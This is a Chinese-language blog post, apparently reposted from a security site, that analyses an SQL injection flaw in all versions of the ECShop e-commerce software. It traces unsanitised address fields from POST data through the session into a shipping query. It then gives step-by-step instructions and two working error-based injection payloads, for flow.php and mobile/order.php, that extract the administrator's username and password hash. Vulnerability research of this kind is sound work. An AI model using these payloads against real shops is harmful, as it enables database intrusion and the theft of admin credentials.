对ecshop注入漏洞的简单分析（通杀全版本）

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop注入漏洞，影响全版本，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

漏洞关键文件：

/includes/lib_order.php

关键函数：

`01`	`function` `available_shipping_list($region_id_list)`

02 {

`03`	`$sql` `=` `'SELECT s.shipping_id, s.shipping_code, s.shipping_name, '` `.`

`04`	`'s.shipping_desc, s.insure, s.support_cod, a.configure '` `.`

`05`	`'FROM '` `.` `$GLOBALS['ecs']->table('shipping') .` `' AS s, '` `.`

`06`	`$GLOBALS['ecs']->table('shipping_area') .` `' AS a, '` `.`

`07`	`$GLOBALS['ecs']->table('area_region') .` `' AS r '.`

`08`	`'WHERE r.region_id '` `. db_create_in($region_id_list) .`

`09`	`' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';`

10

`11`	`return` `$GLOBALS['db']->getAll($sql);`

12 }

显然对传入的参数没有任何过滤就带入了查询语句。

下面我们追踪这个函数在flow.php中：

第531行：

`1`	`$shipping_list` `= available_shipping_list($region);`

再对传入变量进行追踪：

第530行：

`1`	`$region` `=` `array($consignee['country'],` `$consignee['province'],$consignee['city'],` `$consignee['district']);`

第473行：

`1`	`$consignee` `= get_consignee($_SESSION['user_id']);`

到了一个关键函数：

/includes/lib_order.php

`01`	`function` `get_consignee($user_id)`

02 {

`03`	`if` `(isset($_SESSION['flow_consignee']))`

04 {

`05`	`/* 如果存在session，则直接返回session中的收货人信息 */`

06

`07`	`return` `$_SESSION['flow_consignee'];`

08 }

09 else

10 {

`11`	`/* 如果不存在，则取得用户的默认收货人信息 */`

`12`	`$arr` `=` `array();`

13

`14`	`if` `($user_id` `> 0)`

15 {

`16`	`/* 取默认地址 */`

`17`	`$sql` `=` `"SELECT ua.*".`

`18`	`" FROM "` `.` `$GLOBALS['ecs']->table('user_address') .` `"AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.`

`19`	`" WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";`

20

`21`	`$arr` `=` `$GLOBALS['db']->getRow($sql);`

22 }

23

`24`	`return` `$arr;`

25 }

26 }

显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？

关键点:

第400行： $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

这里对传入参数反转义存入$_SESSION中。

然后看下：

`01`	`$consignee` `=` `array(`

`02`	`'address_id'` `=>` `empty($_POST['address_id']) ? 0 :intval($_POST['address_id']),`

`03`	`'consignee'` `=>` `empty($_POST['consignee']) ?` `''` `: trim($_POST['consignee']),`

`04`	`'country'` `=>` `empty($_POST['country']) ?` `''` `:$_POST['country'],`

`05`	`'province'` `=>` `empty($_POST['province']) ?` `''` `:$_POST['province'],`

`06`	`'city'` `=>` `empty($_POST['city']) ?` `''` `:$_POST['city'],`

`07`	`'district'` `=>` `empty($_POST['district']) ?` `''` `:$_POST['district'],`

`08`	`'email'` `=>` `empty($_POST['email']) ?` `''` `:$_POST['email'],`

`09`	`'address'` `=>` `empty($_POST['address']) ?` `''` `:$_POST['address'],`

`10`	`'zipcode'` `=>` `empty($_POST['zipcode']) ?` `''` `: make_semiangle(trim($_POST['zipcode'])),`

`11`	`'tel'` `=>` `empty($_POST['tel']) ?` `''` `: make_semiangle(trim($_POST['tel'])),`

`12`	`'mobile'` `=>` `empty($_POST['mobile']) ?` `''` `: make_semiangle(trim($_POST['mobile'])),`

`13`	`'sign_building'` `=>` `empty($_POST['sign_building']) ?` `''` `:$_POST['sign_building'],`

`14`	`'best_time'` `=>` `empty($_POST['best_time']) ?` `''` `:$_POST['best_time'],`

15 );

好了注入就这样出现了。

==================

注入测试：

环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

测试程序：ECShop_V2.7.3_UTF8_release1106

1.首先需要点击一个商品加入购物车

2.注册一个会员帐号

3.post提交数据

`1`	`http://127.0.0.1/ecshop/flow.php`

2

3

country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,

0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x

from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=

1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=

checkout&address_id=

=======================================

举一反三，我们根据这个漏洞我们可以继续深入挖掘：

我们搜寻关键函数function available_shipping_list()

在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

利用exp:

1.点击一个商品，点击购买商标

2.登录会员帐号

3.post提交：

http://127.0.0.1/ecshop/mobile/order.php

country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

from：http://lanu.sinaapp.com/0day/124.html

对ecshop注入漏洞的简单分析（通杀全版本）

文章评论